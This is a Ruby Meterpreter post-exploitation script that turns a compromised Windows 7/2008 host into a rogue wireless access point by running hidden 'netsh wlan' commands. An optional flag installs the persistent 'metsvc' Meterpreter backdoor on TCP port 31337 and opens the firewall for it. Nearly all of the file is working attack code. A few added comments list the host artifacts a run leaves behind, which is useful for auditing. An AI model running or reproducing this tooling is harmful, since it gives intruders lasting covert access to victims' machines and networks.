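# $Id: rogueap.rb 10/8/2011
# email: zitstif[@]gmail.com
# website: http://zitstif.no-ip.org/
# name: Kyle Young
# Meterpreter script for deploying a rogue soft ap on Windows 7/2008 wireless clients
# Inspired by Vivek Ramachandran - Thanks Vivek! You Rock!
#
# Flow: parse -n/-k/-S, validate the two required values, confirm the session
# is a Windows 7/2008 host, then run `netsh wlan` to configure and start a
# hosted network; with -S it additionally runs `metsvc` and opens TCP 31337
# in the Windows Firewall. Every failure path raises Rex::Script::Completed,
# which is how Meterpreter scripts terminate.
#
# Host artifacts produced by a successful run (useful when auditing a host):
# a hosted-network configuration, a started hosted network, and, with -S,
# a metsvc service plus a firewall port-opening rule named "metsvc".

# Prints the help text and terminates the script.
#
# @raise [Rex::Script::Completed] always, after printing usage
def usage()
  print_line("Meterpreter script for deploying a rogue soft ap on Windows 7/2008 wireless clients")
  print_line("Usage:\trogueap -n NetworkName -k NetworkKey")
  print_line("OPTIONS:\n")
  print_line("-h\tThis help menu")
  print_line("-n\tRequired for setting ssid")
  print_line("-k\tRequired for setting WPA key")
  print_line("-S\t[Optional] Deploy Meterpreter Service which listens on port 31337")
  raise Rex::Script::Completed
end

# Option table for Rex::Parser::Arguments; the boolean says whether the flag
# takes a value. The -S description previously duplicated the -k text; it now
# matches the usage() output.
@@exec_opts = Rex::Parser::Arguments.new(
  "-h" => [ false, "This is the help menu" ],
  "-n" => [ true,  "Required for setting ssid" ],
  "-k" => [ true,  "Required for setting WPA key" ],
  "-S" => [ false, "[Optional] Deploy Meterpreter Service which listens on port 31337" ]
)

# Prints the script banner.
def message()
  print_status("Rogue SoftAP Script by zitstif")
  print_status("zitstif[@]gmail.com")
end

networkname  = nil
networkkey   = nil
meterservice = false

@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-h"
    usage()
  when "-n"
    networkname = val
  when "-k"
    networkkey = val
  when "-S"
    meterservice = true
  end
end

# Both -n and -k are mandatory; the parser itself does not enforce presence.
if networkname.nil?
  print_error("-n requires an argument! (For example -n PrivateWifi)")
  raise Rex::Script::Completed
end

if networkkey.nil?
  print_error("-k requires an argument! (For example -k PrivateKey)")
  raise Rex::Script::Completed
end

# Minimum length check only; netsh performs its own validation of the key.
if networkkey.length < 8
  print_error("The network key needs to be at least 8 or more characters in length!")
  raise Rex::Script::Completed
end

# Platform gate: the script drives netsh, so anything but a Windows session
# is rejected before any command is sent.
unless client.platform =~ /win32|win64/
  print_error("This meterpreter script won't work on this system!")
  raise Rex::Script::Completed
end

# Version gate on the OS string reported by sysinfo.
winver = client.sys.config.sysinfo
unless winver["OS"] =~ /Windows 7|Windows 2008/
  print_error("This version of Windows is not supported!")
  raise Rex::Script::Completed
end

message()
print_error("Warning! \nThis meterpreter script assumes that you have AT LEAST Administrator privileges")

if meterservice
  print_status("This rogue ap will be deployed with the Meterpreter Service..")
else
  print_status("This rogue ap will not be deployed with the Meterpreter Service..")
end

print_status("Soft AP point name: #{networkname}")
print_status("AP key: #{networkkey}")

# Shared execute() options: no visible window, output channelized back to us.
exec_flags = { 'Hidden' => 'true', 'Channelized' => true }

# NOTE: the rescue below only fires if execute() itself raises (e.g. the
# process could not be created). A netsh error exit is not inspected here, so
# the success messages do not prove the hosted network actually came up.
begin
  print_status("Creating AP..")
  client.sys.process.execute("netsh wlan set hostednetwork mode=allow ssid=#{networkname} key=#{networkkey}", nil, exec_flags)
  print_status("Starting network..")
  client.sys.process.execute("netsh wlan start hostednetwork", nil, exec_flags)
rescue
  print_error("There seemed to be an issue creating the rogue ap point!")
  print_error("Make sure you have at least Administrator privileges!")
  raise Rex::Script::Completed
end

if meterservice
  # `run metsvc` goes through the session console rather than execute(), so a
  # failure inside metsvc may not surface as an exception either.
  # NOTE(review): `netsh firewall` is the legacy firewall context; confirm it is
  # still accepted on the target OS before relying on the port-opening step.
  begin
    print_status("Installing meterpreter service that will listen on port 31337")
    client.console.run_single("run metsvc")
    print_status("Opening appropriate port in firewall..")
    client.sys.process.execute("netsh firewall add portopening tcp 31337 \"metsvc\"", nil, exec_flags)
  rescue
    print_error("There was an error trying to install the meterpreter service!")
    print_error("Make sure you have the appropriate privileges.")
  end
end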